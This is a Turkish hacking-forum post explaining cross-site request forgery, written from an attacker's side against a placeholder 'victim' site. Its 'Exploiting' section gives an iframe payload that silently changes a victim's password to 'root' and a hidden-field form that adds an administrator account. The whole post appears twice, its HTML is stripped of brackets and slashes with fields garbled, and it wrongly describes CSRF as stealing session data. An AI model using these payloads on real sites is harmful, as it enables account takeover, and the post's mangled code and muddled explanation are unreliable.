ll.Abdulhamit
- 14 Nis 2019
- 9 Mesaj
Aktiflik
Seviye
Deneyim
[img=320x178]https://1.bp.blogspot.com/-AwO5q_T2Wh0/Wp2j-XzYhGI/AAAAAAAAAoU/_97_eIUcfNcKi0A5_794I9dE9uLOXoG1QCLcBGAs/s320/csrf-xsrf-acigi.png[/img]
Csrf Nedir
Cross-Site Request Forgery (Csrf - Xsrf - Cross Site Reference Forgery)
Webmaster’ların Coding & Security Bilgi Eksikliğinden Kaynaklanan Güvenlik Zaafiyetidir. Site Yetkilisinin Haberi Olmaksızın Güvenlik Açığının İstismar Edilmesidir.
Saldırganın Javascript Veya Html Kodlarıyla Yetkilinin Oturum Bilgilerini Çalma Olayıdır.
Kurban Önceden Hazırlanmış Bu Js Ve HTML Dosyalarına Tıkladığı Anda Kapana Düşer. Böylelikle Kurbanın Session (Oturum) Bilgileri Saldırgan Tarafından Değiştirilmiş Olur.
Csrf Attack Kullanılarak Yapılabilecekler
Ben Bu Yöntemi Hayal Gücü İle Sınırlıyorum (Tabi Sistemin Güvenliğini Göz Önünde Bulundurarak) Aklınıza Gelebilecek Herşey Ve Sistemin İçeriğine Göre
Saldırganın Tam Yetki Alması Sağlanabilir , Kurbanı Yani Yetkiliyi Devre Dışı Bırakabilir Hatta İleri Düzey Olarak Düşünürsek Banka Hesapları İle Transfer Bile Yapılabilir.
Saldırı Öncesi Bilgiler Ve Kod Mantığı
Kurban.ComSifre.Php - Kurbanımızın Sifre Değiştirme Paneli
Link Get Methoduyla Alındığından Url Şu Şekilde Değişecektir;
Kurban.ComSifre.PhpSifre=Root - Burdan Kullanıcının Yeni Şifresinin Root Olduğunu Görebiliyorsunuz.
İşi Kod Mantığına Dökersek GET Metodu İle Gönderilen İstek Şöyledir.
Form Method=Get Action=Sifre.Php
Input Type=Text Name=Sifre
Input Type=Submit Name=Submit Value=Submit
Form
Kodları Açıklayalım ;
User Click Yani Tıklama Anında , Sunucudan Get Methoduyla Bilgileri Çekip, Sifre.Php’yi Çalıştırmış Olur. Form Method=Get Action=Sifre.Php
Sonrasında Server Sifre.Php’yi Referans Alarak Verileri Çeker.
Exploiting
Saldırganın Hazırladığı Masum Görünen Ama Zararlı Kodlar Barındıran Sayfamız ;
Kurban.ComPaketEder.Htm
Söylediğimiz Gibi, Dıştan Görünümü Gayet Masum Bir Sayfa.
Fakat, İframe Ile , Kurbanın Bilgisi Dışında Şifresi Değişecek Ve Kurban Kapana Düşmüş Olacaktır.
İframe Kodlarınızı Biliyoruz Ancak Bilmeyenler İçin Örneklendirirsek ;
Iframe Src= HttpKurban.ComSifresifre=Root
Böylelikle Click Anında Şifre Root Olarak Değişecektir.
CSRF İle Yetkili Şifrelerini Değiştirmenin Yanı Sıra Yetkili Ekleme , Yekili Değiştime , Silme İşlemleri De Yapılabilir.Örnek Verecek Olursak ;
Html
Form Name=Admin Action=HttpsKurbanYoneticiaction=User_ekle Method=Post
Input Type=Hidden Name=Action Value=User_ekleBr
Input Type=Hidden Value=Usre Name=RootBr
Input Type=Hidden Value=Pass Name=ToorBr
Input Type=Hidden Value=Administrator Name=RootBr
Input Type=Hidden Value=Email Name=Root@Toor NOT
Yeni Arkadaşların Çokca Karıştırdığı Bir Nokta Var.Ona Değinmek İstiyorum.
Cross Site Scripting Ve CSRF’nin Aynı Şey Olduğunu Sanan Arkadaşlar Var.Aynı Şeyler Değildirler.Xss (Cross Site Scripting ) Açık Olan Sistemden Kurbana
Gerek Kalmadan Direkt Cookie Çekme İşlemidir.
CSRF İse Kurbanın Bilgisizliği Ve Zararlı Kodun , Yetkili Kurbana Çalıştırılmasıyla Oluşur.
Csrf Nedir
Cross-Site Request Forgery (Csrf - Xsrf - Cross Site Reference Forgery)
Webmaster’ların Coding & Security Bilgi Eksikliğinden Kaynaklanan Güvenlik Zaafiyetidir. Site Yetkilisinin Haberi Olmaksızın Güvenlik Açığının İstismar Edilmesidir.
Saldırganın Javascript Veya Html Kodlarıyla Yetkilinin Oturum Bilgilerini Çalma Olayıdır.
Kurban Önceden Hazırlanmış Bu Js Ve HTML Dosyalarına Tıkladığı Anda Kapana Düşer. Böylelikle Kurbanın Session (Oturum) Bilgileri Saldırgan Tarafından Değiştirilmiş Olur.
Csrf Attack Kullanılarak Yapılabilecekler
Ben Bu Yöntemi Hayal Gücü İle Sınırlıyorum (Tabi Sistemin Güvenliğini Göz Önünde Bulundurarak) Aklınıza Gelebilecek Herşey Ve Sistemin İçeriğine Göre
Saldırganın Tam Yetki Alması Sağlanabilir , Kurbanı Yani Yetkiliyi Devre Dışı Bırakabilir Hatta İleri Düzey Olarak Düşünürsek Banka Hesapları İle Transfer Bile Yapılabilir.
Saldırı Öncesi Bilgiler Ve Kod Mantığı
Kurban.ComSifre.Php - Kurbanımızın Sifre Değiştirme Paneli
Link Get Methoduyla Alındığından Url Şu Şekilde Değişecektir;
Kurban.ComSifre.PhpSifre=Root - Burdan Kullanıcının Yeni Şifresinin Root Olduğunu Görebiliyorsunuz.
İşi Kod Mantığına Dökersek GET Metodu İle Gönderilen İstek Şöyledir.
Form Method=Get Action=Sifre.Php
Input Type=Text Name=Sifre
Input Type=Submit Name=Submit Value=Submit
Form
Kodları Açıklayalım ;
User Click Yani Tıklama Anında , Sunucudan Get Methoduyla Bilgileri Çekip, Sifre.Php’yi Çalıştırmış Olur. Form Method=Get Action=Sifre.Php
Sonrasında Server Sifre.Php’yi Referans Alarak Verileri Çeker.
Exploiting
Saldırganın Hazırladığı Masum Görünen Ama Zararlı Kodlar Barındıran Sayfamız ;
Kurban.ComPaketEder.Htm
Söylediğimiz Gibi, Dıştan Görünümü Gayet Masum Bir Sayfa.
Fakat, İframe Ile , Kurbanın Bilgisi Dışında Şifresi Değişecek Ve Kurban Kapana Düşmüş Olacaktır.
İframe Kodlarınızı Biliyoruz Ancak Bilmeyenler İçin Örneklendirirsek ;
Iframe Src= HttpKurban.ComSifresifre=Root
Böylelikle Click Anında Şifre Root Olarak Değişecektir.
CSRF İle Yetkili Şifrelerini Değiştirmenin Yanı Sıra Yetkili Ekleme , Yekili Değiştime , Silme İşlemleri De Yapılabilir.Örnek Verecek Olursak ;
Html
Form Name=Admin Action=HttpsKurbanYoneticiaction=User_ekle Method=Post
Input Type=Hidden Name=Action Value=User_ekleBr
Input Type=Hidden Value=Usre Name=RootBr
Input Type=Hidden Value=Pass Name=ToorBr
Input Type=Hidden Value=Administrator Name=RootBr
Input Type=Hidden Value=Email Name=Root@Toor NOT
Yeni Arkadaşların Çokca Karıştırdığı Bir Nokta Var.Ona Değinmek İstiyorum.
Cross Site Scripting Ve CSRF’nin Aynı Şey Olduğunu Sanan Arkadaşlar Var.Aynı Şeyler Değildirler.Xss (Cross Site Scripting ) Açık Olan Sistemden Kurbana
Gerek Kalmadan Direkt Cookie Çekme İşlemidir.
CSRF İse Kurbanın Bilgisizliği Ve Zararlı Kodun , Yetkili Kurbana Çalıştırılmasıyla Oluşur.


